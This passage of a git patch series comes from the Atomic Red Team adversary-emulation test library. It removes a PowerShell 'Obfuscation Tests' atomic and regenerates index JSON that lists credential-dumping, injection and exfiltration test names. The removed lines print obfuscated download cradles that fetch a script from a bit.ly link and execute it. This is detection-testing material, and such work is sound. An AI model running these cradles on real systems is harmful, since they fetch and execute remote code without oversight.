From af13a591773c8b2f6c3ceeb5fc62390edbb1bf1f Mon Sep 17 00:00:00 2001
From: Carrie Roberts
Date: Wed, 21 Feb 2024 11:25:36 -0500
Subject: [PATCH 01/41] remove atomic w/broken bitly link (#2693)
---
 atomics/T1059.001/T1059.001.yaml | 12 ------------
 1 file changed, 12 deletions(-)
diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml
index a957c18625..89ee87a182 100644
--- a/atomics/T1059.001/T1059.001.yaml
+++ b/atomics/T1059.001/T1059.001.yaml
@@ -60,18 +60,6 @@ atomic_tests:
 cleanup_command: |
 Remove-Item $env:Temp\*BloodHound.zip -Force
 name: powershell
-- name: Obfuscation Tests
- auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804
- description: |
- Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
- supported_platforms:
- - windows
- executor:
- command: |
- (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
- (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
- Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
- name: powershell
 - name: Mimikatz - Cradlecraft PsSendKeys
 auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d
 description: |
From a840cf62458500fb33efe3b150cd78c8b68fbfec Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator
Date: Wed, 21 Feb 2024 16:26:59 +0000
Subject: [PATCH 02/41] Generated docs from job=generate-docs branch=master [ci skip]
---
 .../art-navigator-layer-windows.json | 2 +-
 .../art-navigator-layer.json | 2 +-
 atomics/Indexes/Indexes-CSV/index.csv | 35 +++---
 atomics/Indexes/Indexes-CSV/windows-index.csv | 35 +++---
 atomics/Indexes/Indexes-Markdown/index.md | 35 +++---
 .../Indexes/Indexes-Markdown/windows-index.md | 35 +++---
 atomics/Indexes/index.yaml | 15 ---
 atomics/Indexes/windows-index.yaml | 15 ---
 atomics/T1059.001/T1059.001.md | 100 ++++++------------
 9 files changed, 104 insertions(+), 170 deletions(-)
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index 1433899a58..2fbf9f9c01 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@ -{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump 
volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with 
ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl 
windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via 
Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":32,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":21,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Obfuscation Tests\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer 
information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- 
Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View 
